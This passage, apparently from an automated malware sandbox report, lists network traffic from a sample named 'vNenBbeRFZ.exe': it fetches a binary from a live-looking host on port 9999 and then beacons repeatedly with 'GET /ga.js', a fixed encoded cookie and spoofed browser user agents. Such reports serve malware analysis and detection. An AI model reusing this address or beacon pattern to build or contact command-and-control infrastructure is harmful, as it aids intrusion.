Oct 8, 2024 04:23:05.622862101 CEST	9999	54453	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:05.622909069 CEST	54453	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:05.733817101 CEST	54453	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:05.734072924 CEST	54454	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:05.739844084 CEST	9999	54453	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:05.739878893 CEST	9999	54454	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:05.740004063 CEST	54454	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:05.740123987 CEST	54454	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:05.744939089 CEST	9999	54454	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:06.657939911 CEST	9999	54454	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:06.658046007 CEST	9999	54454	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:06.658163071 CEST	54454	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:06.659427881 CEST	54454	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:06.664330959 CEST	9999	54454	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:06.765640974 CEST	54455	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:06.770632982 CEST	9999	54455	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:06.770736933 CEST	54455	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:06.770912886 CEST	54455	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:06.775763035 CEST	9999	54455	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:07.685467005 CEST	9999	54455	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:07.685523033 CEST	9999	54455	47.239.242.141	192.168.2.4
Oct 8, 2024 04:23:07.685553074 CEST	54455	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:07.685589075 CEST	54455	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:07.685712099 CEST	54455	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:23:07.690546036 CEST	9999	54455	47.239.242.141	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 04:19:21.004601002 CEST	53	61401	1.1.1.1	192.168.2.4
Oct 8, 2024 04:19:46.582240105 CEST	53	51449	162.159.36.2	192.168.2.4
Oct 8, 2024 04:19:47.046284914 CEST	53	61262	1.1.1.1	192.168.2.4

HTTP Request Dependency Graph

47.239.242.141:9999

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:02.214905977 CEST	192	OUT	GET /BQPy HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUSMSNIP) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:03.123648882 CEST	119	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:02 GMT Content-Type: application/octet-stream Content-Length: 223310

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:04.037848949 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:04.967909098 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:05.081103086 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:05.971898079 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:06.081027985 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:06.998413086 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:07.114514112 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:08.053106070 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:08.219326973 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:09.108695030 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:09.221836090 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:10.121105909 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:10.241225958 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:11.127326965 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:11.237096071 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:12.179554939 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49739	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:12.300080061 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:13.204835892 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49740	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:13.315079927 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:14.236296892 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:14 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49741	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:14.346755981 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:15.280091047 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49742	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:15.393472910 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:16.312841892 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49743	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:16.424582005 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:17.340904951 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49744	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:17.455852985 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:18.389527082 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49746	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:18.502825975 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:19.415683031 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49750	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:19.534092903 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:20.458882093 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49752	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:20.581207037 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:21.516032934 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	57241	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:21.627727032 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:22.527772903 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	57242	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:22.643678904 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:23.610960007 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:23 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	57243	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:23.722069025 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:24.657315016 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	57244	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:24.771400928 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:25.698555946 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	57245	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:25.815562963 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:26.866636038 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	57246	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:26.987217903 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:27.898148060 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	57247	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:28.020628929 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:28.940165043 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	57248	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:19:29.049690962 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:19:29.987798929 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:19:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	57249	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
